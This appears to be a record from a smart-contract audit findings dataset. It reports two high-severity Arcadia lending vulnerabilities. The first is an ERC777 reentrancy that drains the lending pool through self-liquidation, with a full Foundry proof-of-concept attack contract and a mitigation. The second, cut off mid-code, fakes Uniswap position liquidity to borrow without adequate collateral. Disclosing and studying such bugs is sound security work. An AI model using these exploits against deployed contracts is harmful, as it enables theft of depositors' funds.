our USD collateral value will increase to 100 USD, reaching the `minUsdValue`. Now, the creditor will consider our account's collateral to be worth 100 USD instead of 0 USD.\\nLiquidations: Arcadia liquidates unhealthy accounts using a dutch-auction model. When a liquidation is triggered via `Liquidator.liquidateAccount()` all the information regarding the debt and assets from the account will be stored in `auctionInformation_` , which maps account addresses to an `AuctionInformation` struct. An important field in this struct is the `assetShares`, which will store the relative value of each asset, with respect to the total value of the Account.\\nWhen a user wants to bid for an account in liquidation, the `Liquidator.bid()` function must be called. An important feature from this function is that it does not require the bidder to repay the loan in full (thus getting the full collateral in the account). Instead, the bidder can specify which collateral asset and amount wants to obtain back, and the contract will compute the amount of debt required to be repaid from the bidder for that amount of collateral. If the user wants to repay the full loan, all the collateral in the account will be specified by the bidder.\\nWith this background, we can now move on to describing the vulnerability in full.\\nInitially, we will create an account and deposit collateral whose value is in the limit of the configured `minUsdValue` (if the `minUsdValue` is 100 tokens, the ideal amount to have will be 100 tokens to maximize gains). We will see why this is required later. The account's collateral and debt status will look like this:\\n\\nThe next step after creating the account is to trigger a flash action. As mentioned in the introduction, the borrowed funds will be sent to the `actionTarget` (this will be a contract we create and control). An important requirement is that if the borrowed asset is an ERC777 token, we will be able to execute the ERC777 callback in our `actionTarget` contract, enabling us to gain control of the execution flow. Following our example, if we borrowed 200 tokens the account's status would look like this:\\n\\nOn receiving the borrowed tokens, the actual attack will begin. TheactionTarget will trigger the `Liquidator.liquidateAccount()` function to liquidate our own account. This is possible because the funds borrowed using the flash action are accounted as debt for our account (as we can see in the previous image, the borrowed amount greatly surpasses our account's collateral value) prior to executing the `actionTarget` ERC777 callback, making the account susceptible of being liquidated. Executing this function will start the auction process and store data relevant to the account and its debt in the `auctionInformation_` mapping.\\nAfter finishing the `liquidateAccount()` execution, the next step for the `actionTarget` is to place a bid for our own account auction calling `Liquidator.bid()`. The trick here is to request a small amount from the account's collateral in the `askedAssetAmounts` array (if we had 100 tokens as collateral in the account, we could ask for only 1). The small requested amount will make the computed `price` to pay for the bid by `_calculateBidPrice()` be really small so that we can maximize our gains. Another requirement will be to set the `endAuction_` parameter to `true` (we will see why later):\\n```\\n// Liquidator.sol\\n\\nfunction bid(address account, uint256[] memory askedAssetAmounts, bool endAuction_) external nonReentrant {\\n AuctionInformation storage auctionInformation_ = auctionInformation[account];\\n if (!auctionInformation_.inAuction) revert LiquidatorErrors.NotForSale();\\n\\n // Calculate the current auction price of the assets being bought.\\n uint256 totalShare = _calculateTotalShare(auctionInformation_, askedAssetAmounts);\\n uint256 price = _calculateBidPrice(auctionInformation_, totalShare);\\n \\n // Transfer an amount of ""price"" in ""Numeraire"" to the LendingPool to repay the Accounts debt.\\n // The LendingPool will call a ""transferFrom"" from the bidder to the pool -> the bidder must approve the LendingPool.\\n // If the amount transferred would exceed the debt, the surplus is paid out to the Account Owner and earlyTerminate is True.\\n uint128 startDebt = auctionInformation_.startDebt;\\n bool earlyTerminate = ILendingPool(auctionInformation_.creditor).auctionRepay(\\n startDebt, auctionInformation_.minimumMargin, price, account, msg.sender\\n );\\n // rest of code\\n}\\n```\\n\\nAfter computing the small price to pay for the bid, theLendingPool.auctionRepay() will be called. Because we are repaying a really small amount from the debt, the `accountDebt <= amount` condition will NOT hold, so the only actions performed by `LendingPool.auctionRepay()` will be transferring the small amount of tokens to pay the bid, and `_withdraw()` (burn) the corresponding debt from the account (a small amount of debt will be burnt here because the bid amount is small). It is also important to note that the `earlyTerminate` flag will remain as false:\\n```\\n// LendingPool.sol\\n\\nfunction auctionRepay(uint256 startDebt, uint256 minimumMargin_, uint256 amount, address account, address bidder)\\n external\\n whenLiquidationNotPaused\\n onlyLiquidator \\n processInterests\\n returns (bool earlyTerminate)\\n {\\n // Need to transfer before burning debt or ERC777s could reenter.\\n // Address(this) is trusted -> no risk on re-entrancy attack after transfer.\\n asset.safeTransferFrom(bidder, address(this), amount);\\n\\n uint256 accountDebt = maxWithdraw(account); \\n if (accountDebt == 0) revert LendingPoolErrors.IsNotAnAccountWithDebt();\\n if (accountDebt <= amount) {\\n // The amount recovered by selling assets during the auction is bigger than the total debt of the Account.\\n // -> Terminate the auction and make the surplus available to the Account-Owner.\\n earlyTerminate = true;\\n unchecked {\\n _settleLiquidationHappyFlow(account, startDebt, minimumMargin_, bidder, (amount - accountDebt));\\n }\\n amount = accountDebt;\\n }\\n \\n _withdraw(amount, address(this), account); \\n\\n emit Repay(account, bidder, amount);\\n }\\n```\\n\\nAfter `LendingPool.auctionRepay()` , execution will go back to `Liquidator.bid()`. The account's `auctionBid()` function will then be called, which will transfer the 1 token requested by the bidder in the `askedAssetAmounts` parameter from the account's collateral to the bidder. This is the most important concept in the attack. Because 1 token is moving out from the account's collateral, the current collateral value from the account will be decreased from 100 USD to 99 USD, making the collateral value be under the minimum `minUsdValue` amount of 100 USD, and thus making the collateral value from the account go straight to 0 at the eyes of the creditor:\\n\\nBecause the `earlyTerminate` was NOT set to `true` in `LendingPool.auctionRepay()`, the `if (earlyTerminate)` condition will be skipped, going straight to evaluate the `else if (endAuction_)` condition . Because we set theendAuction_ parameter to `true` when calling the `bid()` function, `_settleAuction()` will execute.\\n```\\n// Liquidator.sol\\n\\nfunction bid(address account, uint256[] memory askedAssetAmounts, bool endAuction_) external nonReentrant {\\n // rest of code\\n \\n // Transfer the assets to the bidder.\\n IAccount(account).auctionBid(\\n auctionInformation_.assetAddresses, auctionInformation_.assetIds, askedAssetAmounts, msg.sender\\n );\\n // If all the debt is repaid, the auction must be ended, even if the bidder did not set endAuction to true.\\n if (earlyTerminate) {\\n // Stop the auction, no need to do a health check for the account since it has no debt anymore.\\n _endAuction(account);\\n }\\n // If not all debt is repaid, the bidder can still earn a termination incentive by ending the auction\\n // if one of the conditions to end the auction is met.\\n // ""_endAuction()"" will silently fail without reverting, if the auction was not successfully ended.\\n else if (endAuction_) {\\n if (_settleAuction(account, auctionInformation_)) _endAuction(account);\\n } \\n }\\n```\\n\\n`_settleAuction()` is where the final steps of the attack will take place. Because we made the collateral value of our account purposely decrease from the `minUsdValue`, `_settleAuction` will interpret that all collateral has been sold, and the `else if (collateralValue == 0)` will evaluate to true, making the creditor's `settleLiquidationUnhappyFlow()` function be called:\\n```\\nfunction _settleAuction(address account, AuctionInformation storage auctionInformation_)\\n internal\\n returns (bool success)\\n {\\n // Cache variables.\\n uint256 startDebt = auctionInformation_.startDebt;\\n address creditor = auctionInformation_.creditor;\\n uint96 minimumMargin = auctionInformation_.minimumMargin;\\n\\n uint256 collateralValue = IAccount(account).getCollateralValue();\\n uint256 usedMargin = IAccount(account).getUsedMargin();\\n \\n // Check the different conditions to end the auction.\\n if (collateralValue >= usedMargin || usedMargin == minimumMargin) { \\n // Happy flow: Account is back in a healthy state.\\n // An Account is healthy if the collateral value is equal or greater than the used margin.\\n // If usedMargin is equal to minimumMargin, the open liabilities are 0 and the Account is always healthy.\\n ILendingPool(creditor).settleLiquidationHappyFlow(account, startDebt, minimumMargin, msg.sender);\\n } else if (collateralValue == 0) {\\n // Unhappy flow: All collateral is sold.\\n ILendingPool(creditor).settleLiquidationUnhappyFlow(account, startDebt, minimumMargin, msg.sender);\\n }\\n // rest of code\\n \\n \\n return true;\\n }\\n```\\n\\nExecuting the `settleLiquidationUnhappyFlow()` will burn ALL the remaining debt (balanceOf[account] will return all the remaining balance of debt tokens for the account), and the liquidation will be finished, calling `_endLiquidation()` and leaving the account with 99 tokens of collateral and a 0 amount of debt (and the `actionTarget` with ALL the borrowed funds taken from the flash action).\\n```\\n// LendingPool.sol\\n\\nfunction settleLiquidationUnhappyFlow(\\n address account,\\n uint256 startDebt,\\n uint256 minimumMargin_,\\n address terminator\\n ) external whenLiquidationNotPaused onlyLiquidator processInterests {\\n // rest of code\\n\\n // Any remaining debt that was not recovered during the auction must be written off.\\n // Depending on the size of the remaining debt, different stakeholders will be impacted.\\n uint256 debtShares = balanceOf[account];\\n uint256 openDebt = convertToAssets(debtShares);\\n uint256 badDebt;\\n // rest of code\\n\\n // Remove the remaining debt from the Account now that it is written off from the liquidation incentives/Liquidity Providers.\\n _burn(account, debtShares);\\n realisedDebt -= openDebt;\\n emit Withdraw(msg.sender, account, account, openDebt, debtShares);\\n\\n _endLiquidation();\\n\\n emit AuctionFinished(\\n account, address(this), startDebt, initiationReward, terminationReward, liquidationPenalty, badDebt, 0\\n );\\n }\\n```\\n\\nAfter the actionTarget's ERC777 callback execution, the execution flow will return to the initially called `flashAction()` function, and the final `IAccount(account).flashActionByCreditor()` function will be called, which will pass all the health checks due to the fact that all the debt from the account was burnt:\\n```\\n// LendingPool.sol\\n\\nfunction flashAction(\\n uint256 amountBorrowed,\\n address account,\\n address actionTarget, \\n bytes calldata actionData,\\n bytes3 referrer\\n ) external whenBorrowNotPaused processInterests {\\n \\n // rest of code \\n \\n // The Action Target will use the borrowed funds (optionally with additional assets withdrawn from the Account)\\n // to execute one or more actions (swap, deposit, mint// rest of code).\\n // Next the action Target will deposit any of the remaining funds or any of the recipient token\\n // resulting from the actions back into the Account.\\n // As last step, after all assets are deposited back into the Account a final health check is done:\\n // The Collateral Value of all assets in the Account is bigger than the total liabilities against the Account (including the debt taken during this function).\\n // flashActionByCreditor also checks that the Account indeed has opened a margin account for this Lending Pool.\\n {\\n uint256 accountVersion = IAccount(account).flashActionByCreditor(actionTarget, actionData);\\n if (!isValidVersion[accountVersion]) revert LendingPoolErrors.InvalidVersion();\\n }\\n \\n // rest of code \\n }\\n```\\n\\n```\\n// AccountV1.sol\\n\\nfunction flashActionByCreditor(address actionTarget, bytes calldata actionData)\\n external\\n nonReentrant\\n notDuringAuction\\n updateActionTimestamp\\n returns (uint256 accountVersion)\\n {\\n \\n // rest of code\\n\\n // Account must be healthy after actions are executed.\\n if (isAccountUnhealthy()) revert AccountErrors.AccountUnhealthy();\\n\\n // rest of code\\n }\\n```\\n\\nProof of Concept\\nThe following proof of concept illustrates how the previously described attack can take place. Follow the steps in order to reproduce it:\\nCreate a `ERC777Mock.sol` file in `lib/accounts-v2/test/utils/mocks/tokens` and paste the code found in this github gist.\\nImport the ERC777Mock and change the MockOracles, MockERC20 and Rates structs in `lib/accounts-v2/test/utils/Types.sol` to add an additional `token777ToUsd`, `token777` of type ERC777Mock and `token777ToUsd` rate:\\n`import ""../utils/mocks/tokens/ERC777Mock.sol""; // <----- Import this\\n\\n...\\n\\nstruct MockOracles {\\n ArcadiaOracle stable1ToUsd;\\n ArcadiaOracle stable2ToUsd;\\n ArcadiaOracle token1ToUsd;\\n ArcadiaOracle token2ToUsd;\\n ArcadiaOracle token3ToToken4;\\n ArcadiaOracle token4ToUsd;\\n ArcadiaOracle token777ToUsd; // <----- Add this\\n ArcadiaOracle nft1ToToken1;\\n ArcadiaOracle nft2ToUsd;\\n ArcadiaOracle nft3ToToken1;\\n ArcadiaOracle sft1ToToken1;\\n ArcadiaOracle sft2ToUsd;\\n}\\n\\nstruct MockERC20 {\\n ERC20Mock stable1;\\n ERC20Mock stable2;\\n ERC20Mock token1;\\n ERC20Mock token2;\\n ERC20Mock token3;\\n ERC20Mock token4;\\n ERC777Mock token777; // <----- Add this\\n}\\n\\n...\\n\\nstruct Rates {\\n uint256 stable1ToUsd;\\n uint256 stable2ToUsd;\\n uint256 token1ToUsd;\\n uint256 token2ToUsd;\\n uint256 token3ToToken4;\\n uint256 token4ToUsd;\\n uint256 token777ToUsd; // <----- Add this\\n uint256 nft1ToToken1;\\n uint256 nft2ToUsd;\\n uint256 nft3ToToken1;\\n uint256 sft1ToToken1;\\n uint256 sft2ToUsd;\\n}`\\nReplace the contents inside `lib/accounts-v2/test/fuzz/Fuzz.t.sol` for the code found in this github gist.\\nTo finish the setup, replace the file found in `lending-v2/test/fuzz/Fuzz.t.sol` for the code found in this github gist.\\nFor the actual proof of concept, create a `Poc.t.sol` file in `test/fuzz/LendingPool` and paste the following code. The code contains the proof of concept test, as well as the action target implementation:\\n/**\\n * Created by Pragma Labs\\n * SPDX-License-Identifier: BUSL-1.1\\n */\\npragma solidity 0.8.22;\\n\\nimport { LendingPool_Fuzz_Test } from ""./_LendingPool.fuzz.t.sol"";\\n\\nimport { ActionData, IActionBase } from ""../../../lib/accounts-v2/src/interfaces/IActionBase.sol"";\\nimport { IPermit2 } from ""../../../lib/accounts-v2/src/interfaces/IPermit2.sol"";\\n\\n/// @notice Proof of Concept - Arcadia\\ncontract Poc is LendingPool_Fuzz_Test {\\n\\n /////////////////////////////////////////////////////////////////\\n // TEST CONTRACTS //\\n /////////////////////////////////////////////////////////////////\\n\\n ActionHandler internal actionHandler;\\n bytes internal callData;\\n\\n /////////////////////////////////////////////////////////////////\\n // SETUP //\\n /////////////////////////////////////////////////////////////////\\n\\n function setUp() public override {\\n // Setup pool test\\n LendingPool_Fuzz_Test.setUp();\\n\\n // Deploy action handler\\n vm.prank(users.creatorAddress);\\n actionHandler = new ActionHandler(address(liquidator), address(proxyAccount));\\n\\n // Set origination fee\\n vm.prank(users.creatorAddress);\\n pool.setOriginationFee(100); // 1%\\n\\n // Transfer some tokens to actiontarget to perform liquidation repayment and approve tokens to be transferred to pool \\n vm.startPrank(users.liquidityProvider);\\n mockERC20.token777.transfer(address(actionHandler), 1 ether);\\n mockERC20.token777.approve(address(pool), type(uint256).max);\\n\\n // Deposit 100 erc777 tokens into pool\\n vm.startPrank(address(srTranche));\\n pool.depositInLendingPool(100 ether, users.liquidityProvider);\\n assertEq(mockERC20.token777.balanceOf(address(pool)), 100 ether);\\n\\n // Approve creditor from actiontarget for bid payment\\n vm.startPrank(address(actionHandler));\\n mockERC20.token777.approve(address(pool), type(uint256).max);\\n\\n }\\n\\n /////////////////////////////////////////////////////////////////\\n // POC //\\n /////////////////////////////////////////////////////////////////\\n /// @notice Test exploiting the reentrancy vulnerability. \\n /// Prerequisites:\\n /// - Create an actionTarget contract that will trigger the attack flow using the ERC777 callback when receiving the \\n /// borrowed funds in the flash action.\\n /// - Have some liquidity deposited in the pool in order to be able to borrow it\\n /// Attack:\\n /// 1. Open a margin account in the creditor to be exploited.\\n /// 2. Deposit a small amount of collateral. This amount needs to be big enough to cover the `minUsdValue` configured\\n /// in the registry for the given creditor.\\n /// 3. Create the `actionData` for the account's `flashAction()` function. The data contained in it (withdrawData, transferFromOwnerData,\\n /// permit, signature and actionTargetData) can be empty, given that such data is not required for the attack.\\n /// 4. Trigger LendingPool.flashAction(). The execution flow will:\\n /// a. Mint the flash-actioned debt to the account\\n /// b. Send the borrowed funds to the action target\\n /// c. The action target will execute the ERC777 `tokensReceived()` callback, which will:\\n /// - Trigger Liquidator.liquidateAccount(), which will set the account in an auction state\\n /// - Trigger Liquidator.bid(). \\n \\n function testVuln_reentrancyInFlashActionEnablesStealingAllProtocolFunds(\\n uint128 amountLoaned,\\n uint112 collateralValue,\\n uint128 liquidity,\\n uint8 originationFee\\n ) public { \\n\\n //---------- STEP 1 ----------//\\n // Open a margin account\\n vm.startPrank(users.accountOwner);\\n proxyAccount.openMarginAccount(address(pool)); \\n \\n //---------- STEP 2 ----------//\\n // Deposit 1 stable token in the account as collateral.\\n // Note: The creditors's `minUsdValue` is set to 1 * 10 ** 18. Because\\n // value is converted to an 18-decimal number and the asset is pegged to 1 dollar,\\n // depositing an amount of 1 * 10 ** 6 is the actual minimum usd amount so that the \\n // account's collateral value is not considered as 0.\\n depositTokenInAccount(proxyAccount, mockERC20.stable1, 1 * 10 ** 6);\\n assertEq(proxyAccount.getCollateralValue(), 1 * 10 ** 18);\\n\\n //---------- STEP 3 ----------//\\n // Create empty action data. The action handler won't withdraw/deposit any asset from the account \\n // when the `flashAction()` callback in the account is triggered. Hence, action data will contain empty elements.\\n callData = _buildActionData();\\n\\n // Fetch balances from the action handler (who will receive all the borrowed funds from the flash action)\\n // as well as the pool. \\n // Action handler balance initially has 1 token of `token777` (given initially on deployment)\\n assertEq(mockERC20.token777.balanceOf(address(actionHandler)), 1 * 10 ** 18);\\n uint256 liquidityPoolBalanceBefore = mockERC20.token777.balanceOf(address(pool));\\n uint256 actionHandlerBalanceBefore = mockERC20.token777.balanceOf(address(actionHandler));\\n // Pool initially has 100 tokens of `token777` (deposited by the liquidity provider in setUp())\\n assertEq(mockERC20.token777.balanceOf(address(pool)), 100 * 10 ** 18);\\n\\n //---------- STEP 4 ----------//\\n // Step 4. Trigger the flash action.\\n vm.startPrank(users.accountOwner);\\n\\n pool.flashAction(100 ether , address(proxyAccount), address(actionHandler), callData, emptyBytes3);\\n vm.stopPrank();\\n \\n \\n //---------- FINAL ASSERTIONS ----------//\\n\\n // Action handler (who is the receiver of the borrowed funds in the flash action) has succesfully obtained 100 tokens from \\n //the pool, and in the end it has nearly 101 tokens (initially it had 1 token, plus the 100 tokens stolen \\n // from the pool minus the small amount required to pay for the bid)\\n assertGt(mockERC20.token777.balanceOf(address(actionHandler)), 100 * 10 ** 18);\\n\\n // On the other hand, pool has lost nearly all of its balance, only remaining the small amount paid from the \\n // action handler in order to bid\\n assertLt(mockERC20.token777.balanceOf(address(pool)), 0.05 * 10 ** 18);\\n \\n } \\n\\n /// @notice Internal function to build the `actionData` payload needed to execute the `flashActionByCreditor()` \\n /// callback when requesting a flash action\\n function _buildActionData() internal returns(bytes memory) {\\n ActionData memory emptyActionData;\\n address[] memory to;\\n bytes[] memory data;\\n bytes memory actionTargetData = abi.encode(emptyActionData, to, data);\\n IPermit2.PermitBatchTransferFrom memory permit;\\n bytes memory signature;\\n return abi.encode(emptyActionData, emptyActionData, permit, signature, actionTargetData);\\n }\\n}\\n\\n/// @notice ERC777Recipient interface\\ninterface IERC777Recipient {\\n \\n function tokensReceived(\\n address operator,\\n address from,\\n address to,\\n uint256 amount,\\n bytes calldata userData,\\n bytes calldata operatorData\\n ) external;\\n}\\n\\n /// @notice Liquidator interface\\ninterface ILiquidator {\\n function liquidateAccount(address account) external;\\n function bid(address account, uint256[] memory askedAssetAmounts, bool endAuction_) external;\\n}\\n\\n /// @notice actionHandler contract that will trigger the attack via ERC777's `tokensReceived()` callback\\ncontract ActionHandler is IERC777Recipient, IActionBase {\\n\\n ILiquidator public immutable liquidator;\\n address public immutable account;\\n uint256 triggered;\\n\\n constructor(address _liquidator, address _account) {\\n liquidator = ILiquidator(_liquidator);\\n account = _account;\\n } \\n\\n /// @notice ERC777 callback function\\n function tokensReceived(\\n address operator,\\n address from,\\n address to,\\n uint256 amount,\\n bytes calldata userData,\\n bytes calldata operatorData\\n ) external {\\n // Only trigger the callback once (avoid triggering it while receiving funds in the setup + when receiving final funds)\\n if(triggered == 1) {\\n triggered = 2;\\n liquidator.liquidateAccount(account);\\n uint256[] memory askedAssetAmounts = new uint256[](1);\\n askedAssetAmounts[0] = 1; // only ask for 1 wei of token so that we repay a small share of the debt\\n liquidator.bid(account, askedAssetAmounts, true);\\n }\\n unchecked{\\n triggered++;\\n }\\n }\\n\\n function executeAction(bytes calldata actionTargetData) external returns (ActionData memory) {\\n ActionData memory data;\\n return data;\\n }\\n\\n}\\nExecute the proof of concept with the following command (being inside the `lending-v2` folder): `forge test --mt testVuln_reentrancyInFlashActionEnablesStealingAllProtocolFunds`","This attack is possible because the `getCollateralValue()` function returns a 0 collateral value due to the `minUsdValue` mentioned before not being reached after executing the bid. The Liquidator's `_settleAuction()` function then believes the collateral held in the account is 0.\\nIn order to mitigate the issue, consider fetching the actual real collateral value inside `_settleAuction()` even if it is less than the `minUsdValue` held in the account, so that the function can properly check if the full collateral was sold or not.\\n```\\n// Liquidator.sol\\nfunction _settleAuction(address account, AuctionInformation storage auctionInformation_)\\n internal\\n returns (bool success)\\n {\\n // rest of code\\n\\n uint256 collateralValue = IAccount(account).getCollateralValue(); // <----- Fetch the REAL collateral value instead of reducing it to 0 if `minUsdValue` is not reached\\n \\n \\n // rest of code\\n }\\n```\\n",The impact for this vulnerability is high. All funds deposited in creditors with ERC777 tokens as the underlying asset can be drained.,"```\\n// Liquidator.sol\\n\\nfunction bid(address account, uint256[] memory askedAssetAmounts, bool endAuction_) external nonReentrant {\\n AuctionInformation storage auctionInformation_ = auctionInformation[account];\\n if (!auctionInformation_.inAuction) revert LiquidatorErrors.NotForSale();\\n\\n // Calculate the current auction price of the assets being bought.\\n uint256 totalShare = _calculateTotalShare(auctionInformation_, askedAssetAmounts);\\n uint256 price = _calculateBidPrice(auctionInformation_, totalShare);\\n \\n // Transfer an amount of ""price"" in ""Numeraire"" to the LendingPool to repay the Accounts debt.\\n // The LendingPool will call a ""transferFrom"" from the bidder to the pool -> the bidder must approve the LendingPool.\\n // If the amount transferred would exceed the debt, the surplus is paid out to the Account Owner and earlyTerminate is True.\\n uint128 startDebt = auctionInformation_.startDebt;\\n bool earlyTerminate = ILendingPool(auctionInformation_.creditor).auctionRepay(\\n startDebt, auctionInformation_.minimumMargin, price, account, msg.sender\\n );\\n // rest of code\\n}\\n```\\n" +Caching Uniswap position liquidity allows borrowing using undercollateralized Uni positions,high,"It is possible to fake the amount of liquidity held in a Uniswap V3 position, making the protocol believe the Uniswap position has more liquidity than the actual liquidity deposited in the position. This makes it possible to borrow using undercollateralized Uniswap positions.\\nWhen depositing into an account, the `deposit()` function is called, which calls the internal `_deposit()` function. Depositing is performed in two steps:\\nThe registry's `batchProcessDeposit()` function is called. This function checks if the deposited assets can be priced, and in case that a creditor is set, it also updates the exposures and underlying assets for the creditor.\\nThe assets are transferred and deposited into the account.\\n```\\n// AccountV1.sol\\n\\nfunction _deposit(\\n address[] memory assetAddresses,\\n uint256[] memory assetIds,\\n uint256[] memory assetAmounts,\\n address from\\n ) internal {\\n // If no Creditor is set, batchProcessDeposit only checks if the assets can be priced.\\n // If a Creditor is set, batchProcessDeposit will also update the exposures of assets and underlying assets for the Creditor.\\n uint256[] memory assetTypes =\\n IRegistry(registry).batchProcessDeposit(creditor, assetAddresses, assetIds, assetAmounts);\\n\\n for (uint256 i; i < assetAddresses.length; ++i) {\\n // Skip if amount is 0 to prevent storing addresses that have 0 balance.\\n if (assetAmounts[i] == 0) continue;\\n\\n if (assetTypes[i] == 0) {\\n if (assetIds[i] != 0) revert AccountErrors.InvalidERC20Id();\\n _depositERC20(from, assetAddresses[i], assetAmounts[i]);\\n } else if (assetTypes[i] == 1) {\\n if (assetAmounts[i] != 1) revert AccountErrors.InvalidERC721Amount();\\n _depositERC721(from, assetAddresses[i], assetIds[i]);\\n } else if (assetTypes[i] == 2) {\\n _depositERC1155(from, assetAddresses[i], assetIds[i], assetAmounts[i]);\\n } else {\\n revert AccountErrors.UnknownAssetType();\\n }\\n }\\n\\n if (erc20Stored.length + erc721Stored.length + erc1155Stored.length > ASSET_LIMIT) {\\n revert AccountErrors.TooManyAssets();\\n }\\n }\\n```\\n\\nFor Uniswap positions (and assuming that a creditor is set), calling `batchProcessDeposit()` will internally trigger the UniswapV3AM.processDirectDeposit():\\n```\\n// UniswapV3AM.sol\\n\\nfunction processDirectDeposit(address creditor, address asset, uint256 assetId, uint256 amount)\\n public\\n override\\n returns (uint256 recursiveCalls, uint256 assetType)\\n {\\n // Amount deposited of a Uniswap V3 LP can be either 0 or 1 (checked in the Account).\\n // For uniswap V3 every id is a unique asset -> on every deposit the asset must added to the Asset Module.\\n if (amount == 1) _addAsset(assetId);\\n\\n // rest of code\\n }\\n```\\n\\nThe Uniswap position will then be added to the protocol using the internal `_addAsset()` function. One of the most important actions performed inside this function is to store the liquidity that the Uniswap position has in that moment. Such liquidity is obtained from directly querying the NonfungiblePositionManager contract:\\n```\\nfunction _addAsset(uint256 assetId) internal {\\n // rest of code\\n\\n (,, address token0, address token1,,,, uint128 liquidity,,,,) = NON_FUNGIBLE_POSITION_MANAGER.positions(assetId);\\n\\n // No need to explicitly check if token0 and token1 are allowed, _addAsset() is only called in the\\n // deposit functions and there any deposit of non-allowed Underlying Assets will revert.\\n if (liquidity == 0) revert ZeroLiquidity();\\n\\n // The liquidity of the Liquidity Position is stored in the Asset Module,\\n // not fetched from the NonfungiblePositionManager.\\n // Since liquidity of a position can be increased by a non-owner,\\n // the max exposure checks could otherwise be circumvented.\\n assetToLiquidity[assetId] = liquidity;\\n\\n // rest of code\\n }\\n```\\n\\nAs the snippet shows, the liquidity is stored in a mapping because “Since liquidity of a position can be increased by a non-owner, the max exposure checks could otherwise be circumvented.”. From this point forward, and until the Uniswap position is withdrawn from the account, the collateral value (i.e the amount that the position is worth) will be computed utilizing the `_getPosition()` internal function, which will read the cached liquidity value stored in the `assetToLiquidity[assetId]` mapping, rather than directly consulting the NonFungibleManager contract. This way, the position won't be able to surpass the max exposures:\\n```\\n// UniswapV3AM.sol\\n\\nfunction _getPosition(uint256 assetId)\\n internal\\n view\\n returns (address token0, address token1, int24 tickLower, int24 tickUpper, uint128 liquidity)\\n {\\n // For deposited assets, the liquidity of the Liquidity Position is stored in the Asset Module,\\n // not fetched from the NonfungiblePositionManager.\\n // Since liquidity of a position can be increased by a non-owner, the max exposure checks could otherwise be circumvented.\\n liquidity = uint128(assetToLiquidity[assetId]);\\n\\n if (liquidity > 0) {\\n (,, token0, token1,, tickLower, tickUpper,,,,,) = NON_FUNGIBLE_POSITION_MANAGER.positions(assetId);\\n } else {\\n // Only used as an off-chain view function by getValue() to return the value of a non deposited Liquidity Position.\\n (,, token0, token1,, tickLower, tickUpper, liquidity,,,,) = NON_FUNGIBLE_POSITION_MANAGER.positions(assetId);\\n }\\n }\\n```\\n\\nHowever, storing the liquidity leads to an attack vector that allows Uniswap positions' liquidity to be comlpetely withdrawn while making the protocol believe that the Uniswap position is still full.\\nAs mentioned in the beginning of the report, the deposit process is done in two steps: processing assets in the registry and transferring the actual assets to the account. Because processing assets in the registry is the step where the Uniswap position's liquidity is cached, a malicious depositor can use an ERC777 hook in the transferring process to withdraw the liquidity in the Uniswap position.\\nThe following steps show how the attack could be performed:\\nInitially, a malicious contract must be created. This contract will be the one holding the assets and depositing them into the account, and will also be able to trigger the ERC777's `tokensToSend()` hook.\\nThe malicious contract will call the account's `deposit()` function with two `assetAddresses` to be deposited: the first asset must be an ERC777 token, and the second asset must be the Uniswap position.\\n`IRegistry(registry).batchProcessDeposit()` will then execute. This is the first of the two steps taking place to deposit assets, where the liquidity from the Uniswap position will be fetched from the NonFungiblePositionManager and stored in the `assetToLiquidity[assetId]` mapping.\\nAfter processing the assets, the transferring phase will start. The first asset to be transferred will be the ERC777 token. This will trigger the `tokensToSend()` hook in our malicious contract. At this point, our contract is still the owner of the Uniswap position (the Uniswap position won't be transferred until the ERC777 transfer finishes), so the liquidity in the Uniswap position can be decreased inside the hook triggered in the malicious contract. This leaves the Uniswap position with a smaller liquidity amount than the one stored in the `batchProcessDeposit()` step, making the protocol believe that the liquidity stored in the position is the one that the position had prior to starting the attack.\\nFinally, and following the transfer of the ERC777 token, the Uniswap position will be transferred and succesfully deposited in the account. Arcadia will believe that the account has a Uniswap position worth some liquidity, when in reality the Uni position will be empty.\\nProof of Concept\\nThis proof of concept show show the previous attack can be performed so that the liquidity in the uniswap position is 0, while the collateral value for the account is far greater than 0.\\nCreate a `ERC777Mock.sol` file in `lib/accounts-v2/test/utils/mocks/tokens` and paste the code found in this github gist.\\nImport the ERC777Mock and change the MockOracles, MockERC20 and Rates structs in `lib/accounts-v2/test/utils/Types.sol` to add an additional `token777ToUsd`, `token777` of type ERC777Mock and `token777ToUsd` rate:\\n`import ""../utils/mocks/tokens/ERC777Mock.sol""; // <----- Import this\\n\\n...\\n\\nstruct MockOracles {\\n ArcadiaOracle stable1ToUsd;\\n ArcadiaOracle stable2ToUsd;\\n ArcadiaOracle token1ToUsd;\\n ArcadiaOracle token2ToUsd;\\n ArcadiaOracle token3ToToken4;\\n ArcadiaOracle token4ToUsd;\\n ArcadiaOracle token777ToUsd; // <----- Add this\\n ArcadiaOracle nft1ToToken1;\\n ArcadiaOracle nft2ToUsd;\\n ArcadiaOracle nft3ToToken1;\\n ArcadiaOracle sft1ToToken1;\\n ArcadiaOracle sft2ToUsd;\\n}\\n\\nstruct MockERC20 {\\n ERC20Mock stable1;\\n ERC20Mock stable2;\\n ERC20Mock token1;\\n ERC20Mock token2;\\n ERC20Mock token3;\\n ERC20Mock token4;\\n ERC777Mock token777; // <----- Add this\\n}\\n\\n...\\n\\nstruct Rates {\\n uint256 stable1ToUsd;\\n uint256 stable2ToUsd;\\n uint256 token1ToUsd;\\n uint256 token2ToUsd;\\n uint256 token3ToToken4;\\n uint256 token4ToUsd;\\n uint256 token777ToUsd; // <----- Add this\\n uint256 nft1ToToken1;\\n uint256 nft2ToUsd;\\n uint256 nft3ToToken1;\\n uint256 sft1ToToken1;\\n uint256 sft2ToUsd;\\n}`\\nReplace the contents inside `lib/accounts-v2/test/fuzz/Fuzz.t.sol` for the code found in this github gist.\\nNext step is to replace the file found in `lending-v2/test/fuzz/Fuzz.t.sol` for the code found in this github gist.\\nCreate a `PocUniswap.t.sol` file in `lending-v2/test/fuzz/LendingPool/PocUniswap.t.sol` and paste the following code snippet into it:\\n`/**\\n * Created by Pragma Labs\\n * SPDX-License-Identifier: BUSL-1.1\\n */\\npragma solidity 0.8.22;\\n\\nimport { LendingPool_Fuzz_Test } from ""./_LendingPool.fuzz.t.sol"";\\n\\nimport { IPermit2 } from ""../../../lib/accounts-v2/src/interfaces/IPermit2.sol"";\\nimport { UniswapV3AM_Fuzz_Test, UniswapV3Fixture, UniswapV3AM, IUniswapV3PoolExtension, TickMath } from ""../../../lib/accounts-v2/test/fuzz/asset-modules/UniswapV3AM/_UniswapV3AM.fuzz.t.sol"";\\nimport { ERC20Mock } from ""../../../lib/accounts-v2/test/utils/mocks/tokens/ERC20Mock.sol"";\\n\\nimport ""forge-std/console.sol"";\\n\\ninterface IERC721 {\\n function ownerOf(uint256 tokenid) external returns(address);\\n function approve(address spender, 